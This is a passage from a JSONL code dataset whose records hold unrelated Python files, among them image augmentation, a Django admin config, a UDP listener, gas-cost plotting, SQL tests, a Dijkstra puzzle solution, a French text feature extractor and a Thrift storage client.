f:\r\n cities=f.read().split(\"\\n\") \r\n\r\ndef get_matches(query, choice, limit=3):\r\n result=process.extract(query, choice, limit=limit)\r\n return result\r\n\r\nprint(\"Please enter any city name\")\r\nn= (str(input()))\r\n\r\nprint(\"The matches of the names of the cities are: \", get_matches(n, cities))\r\n","sub_path":"fuzzystring.py","file_name":"fuzzystring.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15606068","text":"\"\"\"\nImplements PILImage,\nwhich subclasses PIL.Image with some extra useful methods\n\"\"\"\n\nimport random\nfrom typing import Optional, Tuple, Dict, List\n\nimport numpy as np\nfrom PIL import Image, ImageFilter\n\n_PERMUTATIONS: Dict[str, Optional[int]] = {\n 'flip_left_right': Image.FLIP_LEFT_RIGHT,\n 'flip_top_bottom': Image.FLIP_TOP_BOTTOM,\n 'rotate_90': Image.ROTATE_90,\n 'rotate_180': Image.ROTATE_180,\n 'rotate_270': Image.ROTATE_270,\n 'transpose': Image.TRANSPOSE,\n 'transverse': Image.TRANSVERSE,\n 'noop': None,\n}\n\n\nclass PILImageError(Exception):\n \"\"\"Error when modifying a PIL image\"\"\"\n\n\nclass PILImage(Image.Image):\n \"\"\"Modifications onto PIL's Image class\n\n self is implicitly the PILImage object\n\n Assumes color images in uint8 scale [0, 255]\n \"\"\"\n\n # Manually config this based on the project\n _SUPPORTED_PERMUTATIONS: List[str] = \\\n list(_PERMUTATIONS.keys())\n\n def __init__(self, img: Optional[Image.Image] = None):\n \"\"\"Initializes a PILImage object with a PIL.Image.Image object, if provided\"\"\"\n super().__init__()\n if img is not None:\n # this is digging into the original code, but these\n # are all the fields of the PIL image class\n # TODO: Find an easier way than hard-coding the attributes\n self.im = img.im\n self.mode = img.mode\n self.size = img.size\n self.palette = img.palette\n self.info = img.info\n self.category = img.category\n self.readonly = img.readonly\n self.pyaccess = img.pyaccess\n\n \"\"\"Handles important initialization methods\"\"\"\n\n @staticmethod\n def from_numpy_array(np_image: np.ndarray) -> 'PILImage':\n \"\"\"Generates a PIL image from an NP array\n\n NP array is assume to be in [0,1] range, np.float32 dtype\n\n :param np_image: np.array representing the image\n :returns: A PILImage object.\n\n .. versionadded:: 1.1.6\n \"\"\"\n return PILImage(\n img=Image.fromarray(\n obj=(np_image*255).astype(np.uint8),\n mode='RGB'\n )\n )\n\n @staticmethod\n def open(fp, mode=\"r\") -> 'PILImage':\n \"\"\"Implements PIL.Image.open, but returns a PILImage instead\n\n Loads in the image to make the operation not lazy\n\n :param fp: A filename (string), pathlib.Path object or a file object.\n The file object must implement :py:meth:`~file.read`,\n :py:meth:`~file.seek`, and :py:meth:`~file.tell` methods,\n and be opened in binary mode.\n :param mode: The mode. If given, this argument must be \"r\".\n :returns: An :py:class:`~PIL.Image.Image` object.\n :exception IOError: If the file cannot be found, or the image cannot be\n opened and identified.\n \"\"\"\n img = Image.open(fp=fp, mode=mode)\n img.load()\n return PILImage(img=img)\n\n def convert_to_rgb(self) -> 'PILImage':\n \"\"\"Converts image to rgb if needed\n\n :return: RGB PILImage\n \"\"\"\n if self.mode != 'RGB':\n return PILImage(self.convert(mode='RGB'))\n return self\n\n def permute(self, method: Optional[int]) -> 'PILImage':\n \"\"\"Applies a permutation to an image via Image.transpose\n\n :param method: Enum specifying operation (see _PERMUTATIONS)\n :return: Permuted image\n \"\"\"\n return self if method is None else PILImage(self.transpose(method))\n\n def get_random_permutation_method(self) -> Optional[int]:\n \"\"\"Gets a random permutation method\"\"\"\n return _PERMUTATIONS.get(random.choice(self._SUPPORTED_PERMUTATIONS))\n\n def random_permute(self) -> 'PILImage':\n \"\"\"Randomly permute an image\n\n :return: permuted image\n \"\"\"\n return self.permute(self.get_random_permutation_method())\n\n def derez(self,\n factor: float = 2.,\n output_size: Optional[Tuple[int, int]] = None) -> 'PILImage':\n \"\"\"Applies a deresolution to an image via downsampling and upsampling\n\n :param factor: Downsample factor\n :param output_size: Output shape of image, default is the image's original shape\n :return: Image of the same shape as input with lower quality\n \"\"\"\n if output_size is None:\n # PIL images use size\n output_size = self.size\n down_size = (\n int(output_size[0] / factor), int(output_size[1] / factor)\n )\n try:\n return PILImage(img=self.resize(down_size).resize(output_size))\n except ValueError as value_err:\n # Handles exceptions caused during the resize operations\n raise PILImageError(\n f'derez operation {self.size} -> {down_size} -> {output_size} '\n f'caused the following exception: {value_err}'\n )\n\n def blur(self) -> 'PILImage':\n \"\"\"Applies a gaussian blur to an image\n\n :return: blurred image\n \"\"\"\n return PILImage(self.filter(ImageFilter.GaussianBlur(radius=2)))\n\n def blur_derez(self,\n factor: float = 2.,\n output_size: Optional[Tuple[int, int]] = None) -> 'PILImage':\n \"\"\"Wraps a derez operation with a blur\n\n :param factor: Downsample factor\n :param output_size: Output size of each image, default is the image's original shape\n :return: Image with lower quality, blurred before and after derez\n \"\"\"\n return PILImage(img=self.blur().derez(factor=factor, output_size=output_size).blur())\n\n def crop_patch(self,\n patch_size: Tuple[int, int],\n patch_location: Tuple[int, int], ) -> 'PILImage':\n \"\"\"Crops a patch of a given size, with its top left corner at patch_location\n\n Raises an exception if the patch_location/patch_size will cause a misshapen crop\n\n This function is littered with exception possiblities, so always try to use\n random_crop_patch\n\n :param patch_size: The patch size\n :param patch_location: Tuple representing the top left corner of the patch\n :return: image of patch_size representing the crop\n \"\"\"\n # patch_size should be positive\n if not all([dim > 0 for dim in patch_size]):\n raise PILImageError(\n f'Patch size must be non-negative. '\n f'patch_size={patch_size} '\n f'{self.info}'\n )\n\n # patch_size should not be larger than the image size in any dimension\n if any([patch_size[idx] > self.size[idx] for idx in range(2)]):\n raise PILImageError(\n f'Patch size must not be larger than image size. '\n f'patch_size={patch_size} '\n f'image_size={self.size} '\n f'{self.info}'\n )\n # compute the corner locations of the patch\n left, upper = patch_location\n right, lower = left + patch_size[0], upper + patch_size[1]\n\n # Raise an exception if the upper left corner is not in the image\n if not (0 <= left and 0 <= upper):\n raise PILImageError(\n f'Upper left patch corner must in the image. '\n f'upper_left_patch_corner={patch_location} '\n f'image_size={self.size} '\n f'{self.info}'\n )\n\n # raise an exception if the lower right corner is not in the image\n if not (right <= self.size[0] and lower <= self.size[1]):\n raise PILImageError(\n f'Bottom right patch corner must in the image. '\n f'lower_right_patch_corner={(right, lower)} '\n f'image_size={self.size} '\n f'{self.info}'\n )\n\n return PILImage(self.crop(box=(left, upper, right, lower)))\n\n def random_crop_patch(self,\n patch_size: Tuple[int, int]) -> 'PILImage':\n \"\"\"Randomly crops a patch of size patch_size\n\n Randomly selects a valid patch_location argument for crop_patch\n\n Can still raise an exception if the patch_size is invalid\n :param patch_size: The patch size\n :return: image of patch_size representing the crop\n \"\"\"\n # self.size[idx]-patch_size[idx] is the maximum size for a given dimension\n # the min is 0,\n patch_location = (\n random.randint(0, self.size[0] - patch_size[0]),\n random.randint(0, self.size[1] - patch_size[1])\n )\n return self.crop_patch(patch_size=patch_size, patch_location=patch_location)\n\n def numpyize(self) -> np.ndarray:\n \"\"\"Returns a numpy array representing the image\n\n Scaled to [0,1]\n\n :return: numpy array\n \"\"\"\n return np.array(self, dtype=np.float32) / 255.\n\n @property\n def image_ops(self) -> Dict:\n \"\"\"Dictionary of all supported image operations\n\n :return: Dictionary mapping the method names to operations\n \"\"\"\n return {\n func.__name__: func for func in\n [self.blur, self.derez, self.blur_derez]\n }\n\n def apply_image_op(self, op_key: str, *args, **kwargs):\n \"\"\"Performs an image operation based on the op_key\n\n :param op_key: Operation key (see image_ops)\n :param args: arguments for method\n :param kwargs: keyword args for method\n :return: Augmented image based on image operation key, if valid\n \"\"\"\n try:\n return self.image_ops[op_key](*args, **kwargs)\n except KeyError:\n raise PILImageError(\n f'Invalid op key argument {op_key}. '\n f'Supported keys: {self.image_ops.keys()}'\n )\n\n def resize(self,\n size: Tuple[int, int],\n resample=Image.NEAREST,\n box=None) -> 'PILImage':\n \"\"\"Replicates Image.resize, but returns a PIL image instead\"\"\"\n return PILImage(super().resize(size, resample, box))\n","sub_path":"modules/image/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"340986494","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django import forms\nfrom app.adminforms import TextsForm\nfrom app.models import PhotoCat, Texts, Photo\n\n__author__ = 'sidchik'\n\n\nclass PhotoCatForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(PhotoCatForm, self).__init__(*args, **kwargs)\n self.fields['parent'].queryset = PhotoCat.objects.filter(parent__isnull=True)\n\n class Meta:\n model = PhotoCat\n\n\nclass PhotoCatAdmin(admin.ModelAdmin):\n form = PhotoCatForm\n\nadmin.site.register(PhotoCat, PhotoCatAdmin)\n\n\nclass TextsAdmin(admin.ModelAdmin):\n form = TextsForm\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\nadmin.site.register(Texts, TextsAdmin)\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Photo, PhotoAdmin)\n\n\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461389624","text":"# -*- coding:utf-8 -*-\n# @Desc: \n# @Author: Administrator\n# @DateTime: 2020-05-29 10:13\n\nimport socket\n\n\ndef main():\n\n # 创建套接字 - udp\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n # 使用套接字接收数据\n\n # 绑定本地信息 - 必须绑定自己电脑的ip和port信息\n udp_socket.bind((\"\", 7878))\n\n # 接收数据 - 指定字节的数据\n while True:\n recv_data = udp_socket.recvfrom(1024)\n # recv_data是一个元组数据(接收的数据, (发送方的ip, port))\n # print(recv_data)\n\n recv_msg = recv_data[0] # 存储接收的数据\n recv_addr = recv_data[1] # 存储发送方的地址信息\n print(\"%s : %s\" %(str(recv_addr), recv_msg.decode(\"utf-8\")))\n\n # 关闭套接字\n udp_socket.close()\n\n\nif __name__ == '__main__':\n\n main()\n\n","sub_path":"[03]Python-基础知识部分/socket-udp套接字接收数据.py","file_name":"socket-udp套接字接收数据.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518071711","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\ncolumns = [\"function_name\", \"gas_cost\", \"user_id\", \"block_number\"]\n\n## ANALYSE FOR 4 GROUP MEMBER\nfile_path = \"client/gas_cost/gas_cost_4.csv\"\ndf = pd.read_csv(file_path, names=columns)\n\n# list of function\nfun_list = df.function_name.unique()\n\nN_fun = len(df.function_name.unique())\n\n# group_size computation\ngroup_size = len(df.user_id.unique())\ngroup = list(df.user_id.unique())\n\n# associate round to each function\ndf['round'] = 0\nfor user in group:\n for fun in fun_list:\n df.loc[(df['user_id']==user) & (df['function_name']==fun),'round'] = range(len(df[(df['user_id']==user) & (df['function_name']==fun)]))\npd.set_option('display.max_rows', None)\n\n# stats - min - mean - max init phase\ninit = df[(df['function_name']!='send_file') & (df['function_name']!='send_share')]\ninit_stats = init.groupby([\"round\", 'function_name']).mean()\ninit_stats.rename(columns={\"gas_cost\":\"gas_cost_mean\"}, inplace=True)\ninit_stats['gas_cost_max'] = init.groupby([\"round\", 'function_name']).max()['gas_cost']\ninit_stats['gas_cost_min'] = init.groupby([\"round\", 'function_name']).min()['gas_cost']\n\n\n\n_, ax = plt.subplots(2,2)\ninit_stats.loc[0].gas_cost_max.plot(kind='bar', label=\"gas cost max\", color=\"none\",edgecolor=\"red\", ax=ax[0,0],rot=0)\ninit_stats.loc[0].gas_cost_mean.plot(kind='bar', label=\"gas cost mean\", color='#BADA55', ax=ax[0,0],rot=0)\ninit_stats.loc[0].gas_cost_min.plot(kind='bar', label=\"gas cost min\", color=\"none\", edgecolor=\"blue\", ax=ax[0,0],rot=0)\nax[0,0].set_title(\"Initialisation cost by user- first file\")\n\ninit_stats.loc[1].gas_cost_max.plot(kind='bar', label=\"gas cost max\", color=\"none\",edgecolor=\"red\", ax=ax[1,0],rot=0)\ninit_stats.loc[1].gas_cost_mean.plot(kind='bar', label=\"gas cost mean\", color='#BADA55', ax=ax[1,0],rot=0)\ninit_stats.loc[1].gas_cost_min.plot(kind='bar', label=\"gas cost min\", color=\"none\", edgecolor=\"blue\", ax=ax[1,0],rot=0)\nax[1,0].set_title(\"Initialisation cost by user - next file\")\n\n# stats encryption - decryption\nencrypt = df[(df['function_name']=='send_file') | (df['function_name']=='send_share')].drop(columns=['round'])\nencrypt_stats = encrypt.groupby('function_name').mean()\nencrypt_stats.rename(columns={\"gas_cost\":\"gas_cost_mean\"}, inplace=True)\nencrypt_stats['gas_cost_max'] = encrypt.groupby('function_name').max()['gas_cost']\nencrypt_stats['gas_cost_min'] = encrypt.groupby('function_name').min()['gas_cost']\n\nencrypt_stats.gas_cost_max.plot(kind='bar', label=\"gas cost max\", color=\"none\",edgecolor=\"red\", ax=ax[0,1],rot=0)\nencrypt_stats.gas_cost_mean.plot(kind='bar', label=\"gas cost mean\", color='#BADA55', ax=ax[0,1],rot=0)\nencrypt_stats.gas_cost_min.plot(kind='bar', label=\"gas cost min\", color=\"none\", edgecolor=\"blue\", ax=ax[0,1],rot=0)\nax[0,1].set_title(\"Encryption-decryption cost by user\")\n\n# stats gas cumul\ndf.sort_values(by=\"block_number\", inplace=True)\n\nmapping = {\n \"group_creation\":\"initialisation\",\n \"publish_tpk\":\"initialisation\",\n \"encrypt_shares\":\"initialisation\",\n \"publish_group_key\":\"initialisation\",\n \"send_file\":\"encryption\",\n \"send_share\":\"decryption\"\n}\ndf['phase'] = df['function_name'].map(mapping)\ndf['cumul_gas_cost'] = df['gas_cost'].cumsum()\n\ndf.plot(\"block_number\", \"cumul_gas_cost\",ax=ax[1,1])\nfor r in df['round'].unique():\n min_block = df[(df['round']==r) & (df['phase']=='initialisation')]['block_number'].min()\n max_block = df[(df['round']==r) & (df['phase']=='initialisation')]['block_number'].max()\n ax[1,1].axvspan(min_block,max_block,fill=False, alpha=0.5, label=\"_\"*int(r)+\"initialisation\", hatch=\".\")\n\n min_block = df[(df['round']==r) & (df['phase']=='encryption')]['block_number'].min()\n max_block = df[(df['round']==r) & (df['phase']=='encryption')]['block_number'].max()\n ax[1,1].axvspan(min_block,max_block,color=\"black\", alpha=0.5, label=\"_\"*int(r)+\"encryption\")\n\n min_block = df[(df['round']==r) & (df['phase']=='decryption')]['block_number'].min()\n max_block = df[(df['round']==r) & (df['phase']=='decryption')]['block_number'].max()\n ax[1,1].axvspan(min_block,max_block,fill=False, alpha=0.5,label=\"_\"*int(r)+\"decryption\",hatch=\"//\")\n\nax[0,0].legend()\nax[1,0].legend()\nax[0,1].legend()\nax[1,1].legend()\n\n## ANALYSE FOR DIFFERENT SIZE OF GROUP\n# creation des dataframe\nfile_path_2 = \"client/gas_cost/gas_cost_2.csv\"\ndf_2 = pd.read_csv(file_path_2, names=columns)\nfile_path_4 = \"client/gas_cost/gas_cost_4.csv\"\ndf_4 = pd.read_csv(file_path_4, names=columns)\nfile_path_6 = \"client/gas_cost/gas_cost_6.csv\"\ndf_6 = pd.read_csv(file_path_6, names=columns)\nfile_path_10 = \"client/gas_cost/gas_cost_10.csv\"\ndf_10 = pd.read_csv(file_path_10, names=columns)\n\nlist_df = [(2,df_2),(4,df_4),(6,df_6),(10,df_10)]\n\n# associate round to each function\nfor i,df in list_df:\n group_size = len(df.user_id.unique())\n group = list(df.user_id.unique())\n\n df['round'] = 0\n for user in group:\n for fun in fun_list:\n df.loc[(df['user_id']==user) & (df['function_name']==fun),'round'] = range(len(df[(df['user_id']==user) & (df['function_name']==fun)]))\n\ndf_2['client_number'] = 2\ndf_4['client_number'] = 4\ndf_6['client_number'] = 6\ndf_10['client_number'] = 10\n\ndf = pd.concat([df_2, df_4, df_6, df_10])\ndf = df.groupby(['client_number', 'round', 'function_name']).mean().drop(columns=['block_number']).reset_index()\n# analyse round 0\nround_0 = df[df['round']==0].drop(columns='round').groupby(['client_number','function_name']).mean().unstack(level=1)['gas_cost']\nround_0.plot.bar()\nplt.title('Gas cost of transaction for the first file')\nround_0.plot(marker='o', linestyle=' ',title=\"Gas cost of transaction for the first file\")\n\nlinear_regressor = LinearRegression()\nlinear_regressor.fit(np.array(round_0.index).reshape((-1,1)), round_0['group_creation'])\nx=np.linspace(0,10,100)\ny = linear_regressor.predict(x.reshape(-1,1))\nplt.plot(x,y, label='a0={:.0f} a1={:.0f}'.format(linear_regressor.intercept_, linear_regressor.coef_[0]))\nplt.legend()\n\nlinear_regressor = LinearRegression()\nlinear_regressor.fit(np.array(round_0.index).reshape((-1,1)), round_0['encrypt_shares'])\nx=np.linspace(0,10,100)\ny = linear_regressor.predict(x.reshape(-1,1))\nplt.plot(x,y, label='a0={:.0f} a1={:.0f}'.format(linear_regressor.intercept_, linear_regressor.coef_[0]))\nplt.legend()\n\n# analyse round 1\nround_1 = df[df['round']==1].drop(columns='round').groupby(['client_number','function_name']).mean().unstack(level=1)['gas_cost']\nround_1.plot.bar()\nplt.title('Gas cost of transaction for the second file')\nround_1.plot(marker='o', linestyle=' ',title=\"Gas cost of transaction for the first file\")\n\nlinear_regressor = LinearRegression()\nlinear_regressor.fit(np.array(round_1.index).reshape((-1,1)), round_1['encrypt_shares'])\nx=np.linspace(0,10,100)\ny = linear_regressor.predict(x.reshape(-1,1))\nplt.plot(x,y, label='a0={:.0f} a1={:.0f}'.format(linear_regressor.intercept_, linear_regressor.coef_[0]))\nplt.legend()\n\nplt.show()\n","sub_path":"gas_cost_plot.py","file_name":"gas_cost_plot.py","file_ext":"py","file_size_in_byte":6994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330046516","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nbasedir = os.path.realpath(os.path.dirname(__file__))\nsys.path.append(os.path.join(basedir, \"..\"))\n\nfrom common import BaseTest\nfrom sql import SELECT\nfrom common import fileop\nfrom common import dbop\n\n\nclass TestSelect(BaseTest):\n \n def __init__(self, configPath):\n BaseTest.__init__(self, configPath, self.__class__.__name__)\n \n def setUp(self):\n pass\n \n def test_select_where(self):\n SQL = SELECT.create_sql_select_where()\n pgfile = dbop.sql_exe_pg_tofile('../peloton_test.conf', SQL, 'select_where.out')\n ptfile = dbop.sql_exe_pt_tofile('../peloton_test.conf', SQL, 'select_where.out')\n res = fileop.compare_results(pgfile, ptfile)\n self.assertTrue(res)\n ## DEF\n\n def test_select_all(self):\n SQL = SELECT.create_sql_select_all()\n pgfile = dbop.sql_exe_pg_tofile('../peloton_test.conf', SQL, 'select_all.out')\n ptfile = dbop.sql_exe_pt_tofile('../peloton_test.conf', SQL, 'select_all.out')\n res = fileop.compare_results(pgfile, ptfile)\n self.assertTrue(res)\n ## DEF\n\n def test_select_where_withoutfile(self):\n SQL = SELECT.create_sql_select_where()\n pgres = dbop.sql_exe_pg('../peloton_test.conf', SQL)\n ptres = dbop.sql_exe_pt('../peloton_test.conf', SQL)\n selt.assertTrue(pgres)\n ## DEF\n \n## CLASS\n\nif __name__ == '__main__':\n x = TestSelect(os.path.realpath(\"../test.conf\"))\n from pprint import pprint\n pprint(sorted(x.getTestTables(\"target\")))\n## IF\n\n","sub_path":"old/old_test_modules/_old/test_select.py","file_name":"test_select.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401641269","text":"import TasMinTabCle\nimport time\nimport cle\nimport os\nimport csv\n\ndef mesureTemps(a,b):\n a.Union(b)\n\ndef mesureUnion(allFiles):\n allFiles.sort()\n allTas = list()\n for x in allFiles:\n param = list()\n f = open(\"cles_alea/\"+x,'r')\n for line in f:\n k = cle.Cle(line)\n param.append(k)\n \n a = TasMinTabCle.TasMinTab()\n a.ConsIter(param)\n allTas.append([x,a])\n \n tasJeu1 = allTas[0:8]\n tasJeu2 = allTas[8:16]\n tasJeu3 = allTas[16:24]\n tasJeu4 = allTas[24:32]\n tasJeu5 = allTas[32:40]\n \n \n res = list()\n \n for i in range(0,len(tasJeu1)):\n name = tasJeu1[i][0]\n numName = name[14:]\n d = time.time()\n mesureTemps(tasJeu1[i][1],tasJeu2[i][1])\n mesureTemps(tasJeu1[i][1],tasJeu3[i][1])\n mesureTemps(tasJeu1[i][1],tasJeu4[i][1])\n mesureTemps(tasJeu1[i][1],tasJeu5[i][1])\n e = time.time()\n tps = (e-d)*(10**3)\n res.append((\"5 * \"+numName,tps))\n \n return res\n\nallFiles = os.listdir(\"cles_alea\") \n \nRes = mesureUnion(allFiles)\ntotal = 0\nfor f in Res:\n total = total + f[1]\nRes.append((-1,\"total du temps en miliseconde pour tout les fichiers : \",total))\ncsvfileTime = \"timeTasMinTabUnion.csv\"\nwith open(csvfileTime,\"w\") as output:\n writer = csv.writer(output,lineterminator='\\n')\n writer.writerows(Res)\nprint(Res)","sub_path":"MesureTasMinTabCode/MesureTasMinUnion.py","file_name":"MesureTasMinUnion.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167726123","text":"import dijkstra\nfrom solutions import Solution\n\n\ndef pe083() -> int:\n data = []\n with open(\"p083_matrix.txt\") as data_file:\n for line in data_file:\n data.append([int(x) for x in line.strip().split(\",\")])\n\n # data[y][x] contains the value in the yth row from top, xth column from left\n\n weights = {(x, y): {} for x in range(80) for y in range(80)}\n for x in range(80):\n for y in range(80):\n if x != 0:\n weights[(x - 1, y)][(x, y)] = data[y][x]\n if y != 0:\n weights[(x, y - 1)][(x, y)] = data[y][x]\n if x != 79:\n weights[(x + 1, y)][(x, y)] = data[y][x]\n if y != 79:\n weights[(x, y + 1)][(x, y)] = data[y][x]\n\n return data[0][0] + dijkstra.dijkstra((0, 0), (79, 79), weights)\n\n\nsolution = Solution(pe083, 425185)\n\nif __name__ == \"__main__\":\n assert solution.is_correct()\n","sub_path":"p083.py","file_name":"p083.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"69871828","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport string\nimport unicodedata\nimport urllib\n\nimport nltk\nimport scipy\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import normalize\n\n\ndef stopword_loader(\n url=\"https://raw.githubusercontent.com/mkobbi/subvention-status-datacamp/master/data/stopwords-filter-fr.txt\"):\n try:\n stopwords = str(urllib.urlopen(url).read().decode(\"utf-8\").lower())\n stopwords = set(stopwords.split('\\n'))\n return stopwords\n except IOError:\n print('Failed to open \"%s\".', url)\n\n\ndef document_preprocessor(doc):\n \"\"\" A custom document preprocessor\n\n This function can be edited to add some additional\n transformation on the documents prior to tokenization.\n\n \"\"\"\n try:\n doc = unicode(doc, 'utf-8')\n except NameError: # unicode is a default on python 3\n pass\n doc = unicodedata.normalize('NFKD', doc)\n doc = doc.encode('ascii', 'ignore')\n doc = doc.decode(\"utf-8\")\n return str(doc).lower()\n\n\n# def generate_tokens\n\n\ndef token_processor(sentence):\n \"\"\" A custom token processor\n\n This function can be edited to add some additional\n transformation on the extracted tokens (e.g. stemming)\n\n At present, this function just passes the tokens through.\n \"\"\"\n stopwords = stopword_loader()\n punctuation = set(string.punctuation)\n punctuation.update([\"``\", \"`\", \"...\"])\n stemmer = nltk.stem.snowball.FrenchStemmer()\n stemmed_tokens = list((filter(lambda x: x not in stopwords and x not in punctuation,\n [stemmer.stem(t)\n for t in nltk.word_tokenize(sentence, 'french', False)\n if t.isalpha()])))\n for t in stemmed_tokens:\n yield t\n\n\ndef cleanDataset(data):\n fr_stopwords_url = \"https://raw.githubusercontent.com/mkobbi/subvention-status-datacamp/master/data/stopwords-filter-fr.txt\"\n string_columns = ['Nom du partenaire'] # [\"Intitul de la demande\"]\n to_drop_columns = [\"Anne\", \"Siret\", \"N SIMPA\", 'CP-Adresse-Libell voie', \"CP-Adresse-Ville\"]\n str_categorical_columns = [\"Nom du partenaire\", \"Appel projets\", \"Appel projets PolVille\"]\n num_categorical_columns = [\"Anne\", \"CP-Adresse-Code postal\"]\n num_categorical_columns = [\"CP-Adresse-Code postal\"]\n data = data.fillna(value=0, axis='columns')\n data[string_columns] = data[string_columns].apply(\n lambda x: x.str.upper().str.normalize('NFKD').str.encode('ascii', errors='ignore').str.decode('utf-8'))\n data[str_categorical_columns] = data[str_categorical_columns].apply(lambda x: x.astype('category').cat.codes)\n data[num_categorical_columns] = data[num_categorical_columns].apply(\n lambda x: x.astype('int')) # .astype('category'))\n fr_stopwords = urllib.urlopen(fr_stopwords_url).read().decode(\"utf-8\").upper()\n fr_stopwords = fr_stopwords.split('\\n')\n # y = np.ravel(pd.DataFrame([data['Total vot'] > 0.0]).astype(int))\n # y = np.ravel(data.pop('y').values)\n data = data.drop(to_drop_columns, axis='columns')\n return data\n\n\nclass FeatureExtractor(TfidfVectorizer):\n \"\"\"Convert a collection of raw docs to a matrix of TF-IDF features. \"\"\"\n\n def __init__(self):\n # see ``TfidfVectorizer`` documentation for other feature\n # extraction parameters.\n super(FeatureExtractor, self).__init__(strip_accents='unicode',\n stop_words=stopword_loader(), analyzer='word')\n\n def fit(self, X_df, y=None):\n \"\"\"Learn a vocabulary dictionary of all tokens in the raw documents.\n\n Parameters\n ----------\n X_df : pandas.DataFrame\n a DataFrame, where the text data is stored in the ``Intitul de la demande``\n column.\n \"\"\"\n X_df = cleanDataset(X_df)\n super(FeatureExtractor, self).fit(X_df)\n return self\n\n def fit_transform(self, X_df, y=None):\n self.fit(X_df)\n return self.transform(X_df)\n\n def transform(self, X_df):\n # print \"transform X_df=\"\n # print X_df\n # print \"transform new=\"\n X_df = cleanDataset(X_df)\n words = super(FeatureExtractor, self).transform(X_df['Intitul de la demande'])\n\n X_df = X_df.drop(['Intitul de la demande'], axis='columns')\n data_sparse = scipy.sparse.csr_matrix(X_df.values[:, 1:])\n X = normalize(scipy.sparse.hstack((data_sparse, words)))\n return X\n\n def build_tokenizer(self):\n \"\"\"\n Internal function, needed to plug-in the token processor, cf.\n http://scikit-learn.org/stable/modules/feature_extraction.html#customizing-the-vectorizer-classes\n \"\"\"\n tokenize = super(FeatureExtractor, self).build_tokenizer()\n return lambda doc: token_processor(doc)","sub_path":"submissions/starting_kit/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224190020","text":"import sys\nimport glob\n#sys.path.append('lib')\n#sys.path.insert(0, glob.glob('../../lib/py/build/lib*')[0])\n\n\nfrom storage import StorageService\nfrom storage.ttypes import StoragePoint\n\nfrom thrift import Thrift\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.transport.TTransport import TTransportException\nfrom thrift.protocol import TBinaryProtocol\n\nclass StorageLibrary(object):\n\n def __init__(self):\n try:\n # Make socket\n self.transport = TSocket.TSocket('localhost', 9090)\n # Buffering is critical. Raw sockets are very slow\n self.transport = TTransport.TBufferedTransport(self.transport)\n # Wrap in a protocol\n self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)\n # Create a client to use the protocol encoder\n self.client = StorageService.Client(self.protocol)\n # Connect!\n self.transport.open()\n except TTransportException:\n raise AssertionError(\"Could not connect to Storage\")\n\n\n def Close(self):\n self.transport.close()\n\n def read_storage_point_value(self, id):\n numeric_id = int(id)\n exists = self._has_storage_point(numeric_id)\n if exists:\n return self.client.read(numeric_id)\n\n raise AssertionError(\"Storage point does not exists\")\n\n def write_storage_point_value(self, id, value):\n numeric_id = int(id)\n return self.client.write(numeric_id, value)\n\n def verify_write_and_read(self, id, value):\n numeric_id = int(id)\n r1 = self.client.read(numeric_id)\n self.client.write(numeric_id, value)\n r2 = self.client.read(numeric_id)\n if not r2 == value:\n raise AssertionError(\"write read failed\")\n\n def read_storage_points(self):\n points = self.client.storagePoints()\n\n print(\"type: \" + str(type(points)))\n for point in points:\n print(\"ID:\" + str(point.storageId) + \" Name: \" + point.name + \" Desc:\" + str(\n point.description) + \" Value:\" + str(point.value))\n #raise AssertionError(\"write read failed\")\n\n def _has_storage_point(self, id):\n points = self.client.storagePoints()\n\n print(\"type: \" + str(type(points)))\n for point in points:\n print(\"ID:\" + str(point.storageId) + \" Name: \" + point.name + \" Desc:\" + str(\n point.description) + \" Value:\" + str(point.value))\n if point.storageId == id:\n return True\n\n return False\n\n\n\nif __name__ == \"__main__\":\n app = StorageLibrary()\n app.client.ping()\n app.read_storage_points()\n #app.write_storage_point_value(0, \"new value\")\n #print(\"value: \" + app.read_storage_point_value(0))\n app.Close()","sub_path":"code/tests/lib/StorageLibrary.py","file_name":"StorageLibrary.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617078514","text":"# 7. Min no of deletions from a string to make it a palindrome\n\ndef minDeletions(X,Y,n,m):\n for i in range(n+1):\n for j in range(m+1):\n if i == 0 or j == 0:\n t[i][j] = 0\n\n for i in range(1, n+1):\n for j in range(1, m+1):\n if X[i-1] == Y[j-1]:\n # t[i][j] = 1 + lcs(X,Y, n-1,m-1)\n t[i][j] = 1 + t[i-1][j-1]\n\n else:\n 